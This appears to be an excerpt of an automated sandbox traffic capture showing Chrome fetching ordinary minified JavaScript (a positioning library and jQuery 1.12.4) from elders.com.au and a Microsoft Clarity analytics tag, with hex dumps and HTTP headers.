                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 70 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 70 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 67 26 26 6d 29 6d 3d 70 61 72 73 65 46 6c 6f 61 74 28 44 2e 6d 61 72 67 69 6e 54 6f 70 29 2c 44 3d 70 61 72 73 65 46 6c 6f 61 74 28 44 2e 6d 61 72 67 69 6e 4c 65 66 74 29 2c 70 2e 74 6f 70 2d 3d 4e 2d 6d 2c 70 2e 62 6f 74 74 6f 6d 2d 3d 4e 2d 6d 2c 70 2e 6c 65 66 74 2d 3d 47 2d 44 2c 70 2e 72 69 67 68 74 2d 3d 47 2d 44 2c 70 2e 6d 61 72 67 69 6e 54 6f 70 3d 6d 2c 70 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 44 3b 72 65 74 75 72 6e 28 67 26 26 21 64 3f 6b 2e 63 6f 6e 74 61 69 6e 73 28 41 29 3a 6b 3d 3d 3d 41 26 26 22 42 4f 44 59 22 21 3d 3d 41 2e 6e 6f 64 65 4e 61 6d
                                                                                                                                                                                                            Data Ascii: ,width:p.width,height:p.height});if(p.marginTop=0,p.marginLeft=0,!g&&m)m=parseFloat(D.marginTop),D=parseFloat(D.marginLeft),p.top-=N-m,p.bottom-=N-m,p.left-=G-D,p.right-=G-D,p.marginTop=m,p.marginLeft=D;return(g&&!d?k.contains(A):k===A&&"BODY"!==A.nodeNam
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 6d 3d 74 2b 6d 2e 74 6f 70 2c 70 2e 6c 65 66 74 2b 3d 6d 2e 6c 65 66 74 2d 6d 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 70 2e 72 69 67 68 74 3d 41 2b 6d 2e 6c 65 66 74 29 7d 6d 3d 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 28 64 3d 64 7c 7c 30 29 3b 72 65 74 75 72 6e 20 70 2e 6c 65 66 74 2b 3d 6d 3f 64 3a 64 2e 6c 65 66 74 7c 7c 0a 30 2c 70 2e 74 6f 70 2b 3d 6d 3f 64 3a 64 2e 74 6f 70 7c 7c 30 2c 70 2e 72 69 67 68 74 2d 3d 6d 3f 64 3a 64 2e 72 69 67 68 74 7c 7c 30 2c 70 2e 62 6f 74 74 6f 6d 2d 3d 6d 3f 64 3a 64 2e 62 6f 74 74 6f 6d 7c 7c 30 2c 70 7d 66 75 6e 63 74 69 6f 6e 20 49 62 28 66 2c 6b 2c 64 2c 67 2c 6d 29 7b 76 61 72 20 70 3d 35 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 35 5d
                                                                                                                                                                                                            Data Ascii: m=t+m.top,p.left+=m.left-m.marginLeft,p.right=A+m.left)}m="number"==typeof(d=d||0);return p.left+=m?d:d.left||0,p.top+=m?d:d.top||0,p.right-=m?d:d.right||0,p.bottom-=m?d:d.bottom||0,p}function Ib(f,k,d,g,m){var p=5<arguments.length&&void 0!==arguments[5]
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 6c 69 74 28 22 2d 22 29 5b 30 5d 3b 66 3d 75 62 28 66 29 3b 76 61 72 20 67 3d 7b 77 69 64 74 68 3a 66 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 66 2e 68 65 69 67 68 74 7d 2c 6d 3d 2d 31 21 3d 3d 5b 22 72 69 67 68 74 22 2c 22 6c 65 66 74 22 5d 2e 69 6e 64 65 78 4f 66 28 64 29 2c 70 3d 6d 3f 22 74 6f 70 22 3a 22 6c 65 66 74 22 2c 74 3d 6d 3f 22 6c 65 66 74 22 3a 22 74 6f 70 22 2c 41 3d 6d 3f 22 68 65 69 67 68 74 22 3a 22 77 69 64 74 68 22 3b 72 65 74 75 72 6e 20 67 5b 70 5d 3d 6b 5b 70 5d 2b 6b 5b 41 5d 2f 32 2d 66 5b 41 5d 2f 32 2c 67 5b 74 5d 3d 64 3d 3d 3d 74 3f 6b 5b 74 5d 2d 66 5b 6d 3f 22 77 69 64 74 68 22 3a 22 68 65 69 67 68 74 22 5d 3a 6b 5b 62 62 28 74 29 5d 2c 67 7d 66 75 6e 63 74 69 6f 6e 20 63 62 28 66 2c 6b 29 7b 72 65 74 75 72 6e 20 41 72 72
                                                                                                                                                                                                            Data Ascii: lit("-")[0];f=ub(f);var g={width:f.width,height:f.height},m=-1!==["right","left"].indexOf(d),p=m?"top":"left",t=m?"left":"top",A=m?"height":"width";return g[p]=k[p]+k[A]/2-f[A]/2,g[t]=d===t?k[t]-f[m?"width":"height"]:k[bb(t)],g}function cb(f,k){return Arr
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 63 72 6f 6c 6c 22 2c 64 2e 75 70 64 61 74 65 42 6f 75 6e 64 2c 64 2e 73 63 72 6f 6c 6c 50 61 72 65 6e 74 73 29 2c 64 2e 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 3d 66 2c 64 2e 65 76 65 6e 74 73 45 6e 61 62 6c 65 64 3d 21 30 2c 64 7d 66 75 6e 63 74 69 6f 6e 20 76 61 28 29 7b 76 61 72 20 66 2c 6b 3b 74 68 69 73 2e 73 74 61 74 65 2e 65 76 65 6e 74 73 45 6e 61 62 6c 65 64 26 26 28 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 74 68 69 73 2e 73 63 68 65 64 75 6c 65 55 70 64 61 74 65 29 2c 74 68 69 73 2e 73 74 61 74 65 3d 28 66 3d 74 68 69 73 2e 72 65 66 65 72 65 6e 63 65 2c 6b 3d 74 68 69 73 2e 73 74 61 74 65 2c 4b 62 28 66 29 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 73 69 7a 65 22 2c 6b 2e 75 70 64 61 74 65 42 6f
                                                                                                                                                                                                            Data Ascii: croll",d.updateBound,d.scrollParents),d.scrollElement=f,d.eventsEnabled=!0,d}function va(){var f,k;this.state.eventsEnabled&&(cancelAnimationFrame(this.scheduleUpdate),this.state=(f=this.reference,k=this.state,Kb(f).removeEventListener("resize",k.updateBo
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 64 2c 20 75 73 65 20 61 20 63 6f 6d 6d 61 20 28 2c 29 20 69 6e 73 74 65 61 64 2e 22 29 3b 76 61 72 20 74 3d 2f 5c 73 2a 2c 5c 73 2a 7c 5c 73 2b 2f 3b 66 3d 2d 31 21 3d 3d 67 3f 5b 66 2e 73 6c 69 63 65 28 30 2c 67 29 2e 63 6f 6e 63 61 74 28 5b 66 5b 67 5d 2e 73 70 6c 69 74 28 74 29 5b 30 5d 5d 29 2c 0a 5b 66 5b 67 5d 2e 73 70 6c 69 74 28 74 29 5b 31 5d 5d 2e 63 6f 6e 63 61 74 28 66 2e 73 6c 69 63 65 28 67 2b 31 29 29 5d 3a 5b 66 5d 3b 72 65 74 75 72 6e 28 66 3d 66 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 41 2c 44 29 7b 76 61 72 20 4e 3d 28 31 3d 3d 3d 44 3f 21 70 3a 70 29 3f 22 68 65 69 67 68 74 22 3a 22 77 69 64 74 68 22 2c 47 3d 21 31 3b 72 65 74 75 72 6e 20 41 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 4a 2c 55 29 7b 72 65 74 75 72 6e 22 22 3d
                                                                                                                                                                                                            Data Ascii: d, use a comma (,) instead.");var t=/\s*,\s*|\s+/;f=-1!==g?[f.slice(0,g).concat([f[g].split(t)[0]]),[f[g].split(t)[1]].concat(f.slice(g+1))]:[f];return(f=f.map(function(A,D){var N=(1===D?!p:p)?"height":"width",G=!1;return A.reduce(function(J,U){return""=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            115192.168.2.457792162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC597OUTGET /etc.clientlibs/clientlibs/granite/jquery.lc-f9e8e8c279baf6a1a278042afe4f395a-lc.min.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC624INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:52 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Wed, 25 Sep 2024 07:45:08 GMT
                                                                                                                                                                                                            etag: W/"18d32-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 981252
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210109-DFW
                                                                                                                                                                                                            x-cache: HIT
                                                                                                                                                                                                            x-timer: S1727292578.327113,VS0,VS0,VE1
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b03598584752-DFW
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC745INData Raw: 37 64 32 65 0d 0a 2f 2a 0a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 31 2e 31 32 2e 34 2d 61 65 6d 0a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 0a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 68 74 74 70 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 0a 20 44 61 74 65 3a 20 32 30 31 36 2d 30 35 2d 32 30 54 31 37 3a 31 37 5a 0a 20 53 69 7a 7a 6c
                                                                                                                                                                                                            Data Ascii: 7d2e/* jQuery JavaScript Library v1.12.4-aem http://jquery.com/ Includes Sizzle.js http://sizzlejs.com/ Copyright jQuery Foundation and other contributors Released under the MIT license http://jquery.org/license Date: 2016-05-20T17:17Z Sizzl
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6e 61 28 6a 61 29 7d 3a 6e 61 28 79 29 7d 29 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 79 2c 6e 61 29 7b 66 75 6e 63 74 69 6f 6e 20 6a 61 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65 6e 67 74 68 22 69 6e 20 61 26 26 61 2e 6c 65 6e 67 74 68 2c 64 3d 63 2e 74 79 70 65 28 61 29 3b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 64 7c 7c 63 2e 69 73 57 69 6e 64 6f 77 28 61 29 3f 21 31 3a 22 61 72 72 61 79 22 3d 3d 3d 64 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 79
                                                                                                                                                                                                            Data Ascii: "jQuery requires a window with a document");return na(ja)}:na(y)})("undefined"!==typeof window?window:this,function(y,na){function ja(a){var b=!!a&&"length"in a&&a.length,d=c.type(a);return"function"===d||c.isWindow(a)?!1:"array"===d||0===b||"number"===ty
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 21 30 7d 0a 66 75 6e 63 74 69 6f 6e 20 53 62 28 61 2c 62 2c 64 2c 65 29 7b 69 66 28 58 61 28 61 29 29 7b 76 61 72 20 66 3d 63 2e 65 78 70 61 6e 64 6f 2c 67 3d 61 2e 6e 6f 64 65 54 79 70 65 2c 6b 3d 67 3f 63 2e 63 61 63 68 65 3a 61 2c 6d 3d 67 3f 61 5b 66 5d 3a 61 5b 66 5d 26 26 66 3b 69 66 28 6d 26 26 6b 5b 6d 5d 26 26 28 65 7c 7c 6b 5b 6d 5d 2e 64 61 74 61 29 7c 7c 76 6f 69 64 20 30 21 3d 3d 64 7c 7c 22 73 74 72 69 6e 67 22 21 3d 3d 74 79 70 65 6f 66 20 62 29 7b 6d 7c 7c 28 6d 3d 67 3f 61 5b 66 5d 3d 76 61 2e 70 6f 70 28 29 7c 7c 63 2e 67 75 69 64 2b 2b 3a 66 29 3b 6b 5b 6d 5d 7c 7c 28 6b 5b 6d 5d 3d 67 3f 7b 7d 3a 7b 74 6f 4a 53 4f 4e 3a 63 2e 6e 6f 6f 70 7d 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 62 7c 7c 22 66 75 6e 63 74
                                                                                                                                                                                                            Data Ascii: !0}function Sb(a,b,d,e){if(Xa(a)){var f=c.expando,g=a.nodeType,k=g?c.cache:a,m=g?a[f]:a[f]&&f;if(m&&k[m]&&(e||k[m].data)||void 0!==d||"string"!==typeof b){m||(m=g?a[f]=va.pop()||c.guid++:f);k[m]||(k[m]=g?{}:{toJSON:c.noop});if("object"===typeof b||"funct
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 69 73 74 20 64 65 74 61 69 6c 73 20 64 69 61 6c 6f 67 20 66 69 67 63 61 70 74 69 6f 6e 20 66 69 67 75 72 65 20 66 6f 6f 74 65 72 20 68 65 61 64 65 72 20 68 67 72 6f 75 70 20 6d 61 69 6e 20 6d 61 72 6b 20 6d 65 74 65 72 20 6e 61 76 20 6f 75 74 70 75 74 20 70 69 63 74 75 72 65 20 70 72 6f 67 72 65 73 73 20 73 65 63 74 69 6f 6e 20 73 75 6d 6d 61 72 79 20 74 65 6d 70 6c 61 74 65 20 74 69 6d 65 20 76 69 64 65 6f 22 2e 73 70 6c 69 74 28 22 20 22 29 3b 61 3d 0a 61 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 28 29 3b 69 66 28 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 29 66 6f 72 28 3b 62 2e 6c 65 6e 67 74 68 3b 29 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 2e 70 6f 70 28 29 29 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                            Data Ascii: ist details dialog figcaption figure footer header hgroup main mark meter nav output picture progress section summary template time video".split(" ");a=a.createDocumentFragment();if(a.createElement)for(;b.length;)a.createElement(b.pop());return a}functio
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 64 28 71 29 3b 63 2e 6d 65 72 67 65 28 51 2c 6d 2e 63 68 69 6c 64 4e 6f 64 65 73 29 3b 66 6f 72 28 6d 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 22 22 3b 6d 2e 66 69 72 73 74 43 68 69 6c 64 3b 29 6d 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6d 2e 66 69 72 73 74 43 68 69 6c 64 29 3b 6d 3d 42 2e 6c 61 73 74 43 68 69 6c 64 7d 65 6c 73 65 20 51 2e 70 75 73 68 28 62 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 6b 29 29 3b 6d 26 26 42 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6d 29 3b 7a 2e 61 70 70 65 6e 64 43 68 65 63 6b 65 64 7c 7c 63 2e 67 72 65 70 28 65 61 28 51 2c 22 69 6e 70 75 74 22 29 2c 55 63 29 3b 66 6f 72 28 4c 3d 30 3b 6b 3d 51 5b 4c 2b 2b 5d 3b 29 69 66 28 65 26 26 2d 31 3c 63 2e 69 6e 41 72 72 61 79 28 6b 2c 65 29 29 66 26 26 66 2e 70 75 73 68 28 6b 29
                                                                                                                                                                                                            Data Ascii: d(q);c.merge(Q,m.childNodes);for(m.textContent="";m.firstChild;)m.removeChild(m.firstChild);m=B.lastChild}else Q.push(b.createTextNode(k));m&&B.removeChild(m);z.appendChecked||c.grep(ea(Q,"input"),Uc);for(L=0;k=Q[L++];)if(e&&-1<c.inArray(k,e))f&&f.push(k)
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 2e 65 76 65 6e 74 73 3b 69 66 28 67 29 66 6f 72 28 64 20 69 6e 20 64 65 6c 65 74 65 20 61 2e 68 61 6e 64 6c 65 2c 61 2e 65 76 65 6e 74 73 3d 7b 7d 2c 67 29 66 6f 72 28 66 3d 30 2c 65 3d 67 5b 64 5d 2e 6c 65 6e 67 74 68 3b 66 3c 65 3b 66 2b 2b 29 63 2e 65 76 65 6e 74 2e 61 64 64 28 62 2c 64 2c 67 5b 64 5d 5b 66 5d 29 3b 61 2e 64 61 74 61 26 26 28 61 2e 64 61 74 61 3d 63 2e 65 78 74 65 6e 64 28 7b 7d 2c 61 2e 64 61 74 61 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 47 61 28 61 2c 62 2c 64 2c 65 29 7b 62 3d 65 63 2e 61 70 70 6c 79 28 5b 5d 2c 62 29 3b 76 61 72 20 66 2c 67 3d 30 2c 6b 3d 61 2e 6c 65 6e 67 74 68 2c 6d 3d 6b 2d 31 2c 70 3d 62 5b 30 5d 2c 71 3d 63 2e 69 73 46 75 6e 63 74 69 6f 6e 28 70 29 3b 69 66 28 71 7c 7c 31 3c 6b 26 26 22 73 74 72 69 6e 67 22 3d
                                                                                                                                                                                                            Data Ascii: .events;if(g)for(d in delete a.handle,a.events={},g)for(f=0,e=g[d].length;f<e;f++)c.event.add(b,d,g[d][f]);a.data&&(a.data=c.extend({},a.data))}}function Ga(a,b,d,e){b=ec.apply([],b);var f,g=0,k=a.length,m=k-1,p=b[0],q=c.isFunction(p);if(q||1<k&&"string"=
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 7c 7c 59 61 5b 30 5d 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 29 2e 64 6f 63 75 6d 65 6e 74 2c 62 2e 77 72 69 74 65 28 29 2c 62 2e 63 6c 6f 73 65 28 29 2c 64 3d 67 63 28 61 2c 62 29 2c 59 61 2e 64 65 74 61 63 68 28 29 29 2c 68 63 5b 61 5d 3d 64 29 3b 72 65 74 75 72 6e 20 64 7d 66 75 6e 63 74 69 6f 6e 20 77 62 28 61 2c 0a 62 29 7b 72 65 74 75 72 6e 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 28 29 29 64 65 6c 65 74 65 20 74 68 69 73 2e 67 65 74 3b 65 6c 73 65 20 72 65 74 75 72 6e 28 74 68 69 73 2e 67 65 74 3d 62 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 69 63 28 61 29 7b 69 66 28 61 20 69 6e 20 6a 63 29 72 65 74 75 72 6e 20 61 3b 66
                                                                                                                                                                                                            Data Ascii: contentWindow||Ya[0].contentDocument).document,b.write(),b.close(),d=gc(a,b),Ya.detach()),hc[a]=d);return d}function wb(a,b){return{get:function(){if(a())delete this.get;else return(this.get=b).apply(this,arguments)}}}function ic(a){if(a in jc)return a;f
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 3d 3d 66 29 7b 66 3d 49 61 28 61 2c 62 2c 67 29 3b 69 66 28 30 3e 66 7c 7c 6e 75 6c 6c 3d 3d 66 29 66 3d 61 2e 73 74 79 6c 65 5b 62 5d 3b 69 66 28 64 62 2e 74 65 73 74 28 66 29 29 72 65 74 75 72 6e 20 66 3b 65 3d 6b 26 26 28 7a 2e 62 6f 78 53 69 7a 69 6e 67 52 65 6c 69 61 62 6c 65 28 29 7c 7c 66 3d 3d 3d 61 2e 73 74 79 6c 65 5b 62 5d 29 3b 66 3d 70 61 72 73 65 46 6c 6f 61 74 28 66 29 7c 7c 30 7d 72 65 74 75 72 6e 20 66 2b 6e 63 28 61 2c 62 2c 64 7c 7c 28 6b 3f 22 62 6f 72 64 65 72 22 3a 22 63 6f 6e 74 65 6e 74 22 29 2c 65 2c 67 29 2b 22 70 78 22 7d 66 75 6e 63 74 69 6f 6e 20 68 61 28 61 2c 62 2c 64 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 68 61 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 69 74 28 61 2c 62 2c 64 2c 65 2c 66 29 7d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                            Data Ascii: ==f){f=Ia(a,b,g);if(0>f||null==f)f=a.style[b];if(db.test(f))return f;e=k&&(z.boxSizingReliable()||f===a.style[b]);f=parseFloat(f)||0}return f+nc(a,b,d||(k?"border":"content"),e,g)+"px"}function ha(a,b,d,e,f){return new ha.prototype.init(a,b,d,e,f)}functio
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 5b 5d 2c 63 72 65 61 74 65 54 77 65 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 71 2c 74 29 7b 71 3d 63 2e 54 77 65 65 6e 28 61 2c 70 2e 6f 70 74 73 2c 71 2c 74 2c 70 2e 6f 70 74 73 2e 73 70 65 63 69 61 6c 45 61 73 69 6e 67 5b 71 5d 7c 7c 70 2e 6f 70 74 73 2e 65 61 73 69 6e 67 29 3b 70 2e 74 77 65 65 6e 73 2e 70 75 73 68 28 71 29 3b 72 65 74 75 72 6e 20 71 7d 2c 73 74 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 71 29 7b 76 61 72 20 74 3d 30 2c 76 3d 71 3f 70 2e 74 77 65 65 6e 73 2e 6c 65 6e 67 74 68 3a 30 3b 69 66 28 65 29 72 65 74 75 72 6e 20 74 68 69 73 3b 66 6f 72 28 65 3d 21 30 3b 74 3c 76 3b 74 2b 2b 29 70 2e 74 77 65 65 6e 73 5b 74 5d 2e 72 75 6e 28 31 29 3b 71 3f 28 6b 2e 6e 6f 74 69 66 79 57 69 74 68 28 61 2c 5b 70 2c 31 2c 30 5d 29 2c 6b 2e 72 65 73 6f 6c 76 65
                                                                                                                                                                                                            Data Ascii: [],createTween:function(q,t){q=c.Tween(a,p.opts,q,t,p.opts.specialEasing[q]||p.opts.easing);p.tweens.push(q);return q},stop:function(q){var t=0,v=q?p.tweens.length:0;if(e)return this;for(e=!0;t<v;t++)p.tweens[t].run(1);q?(k.notifyWith(a,[p,1,0]),k.resolve
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 65 78 74 65 6e 64 28 21 30 2c 61 2c 64 29 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 61 64 28 61 29 7b 69 66 28 21 63 2e 63 6f 6e 74 61 69 6e 73 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 43 2c 61 29 29 72 65 74 75 72 6e 21 30 3b 0a 66 6f 72 28 3b 61 26 26 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 3b 29 7b 69 66 28 22 6e 6f 6e 65 22 3d 3d 3d 28 61 2e 73 74 79 6c 65 26 26 61 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 7c 7c 63 2e 63 73 73 28 61 2c 22 64 69 73 70 6c 61 79 22 29 29 7c 7c 22 68 69 64 64 65 6e 22 3d 3d 3d 61 2e 74 79 70 65 29 72 65 74 75 72 6e 21 30 3b 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 7a 62 28 61 2c 62 2c 64 2c 65 29 7b 76 61 72 20 66 3b 69 66 28 63 2e 69
                                                                                                                                                                                                            Data Ascii: extend(!0,a,d);return a}function ad(a){if(!c.contains(a.ownerDocument||C,a))return!0;for(;a&&1===a.nodeType;){if("none"===(a.style&&a.style.display||c.css(a,"display"))||"hidden"===a.type)return!0;a=a.parentNode}return!1}function zb(a,b,d,e){var f;if(c.i


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            116192.168.2.45778713.107.246.454432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC525OUTGET /tag/mupsjrmw7f HTTP/1.1
                                                                                                                                                                                                            Host: www.clarity.ms
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:52 GMT
                                                                                                                                                                                                            Content-Type: application/x-javascript
                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: no-cache, no-store
                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                            Set-Cookie: CLID=489e5e226c6c49998a92be7444faa5c9.20241106.20251106; expires=Thu, 06 Nov 2025 05:29:52 GMT; path=/; secure; samesite=none; httponly
                                                                                                                                                                                                            Request-Context: appId=cid-v1:e97341f6-8fff-46a6-9229-fbbfe0892c78
                                                                                                                                                                                                            x-azure-ref: 20241106T052952Z-16547b76f7fr4g8xhC1DFW9cqc00000005c000000000agcg
                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                            Accept-Ranges: bytes
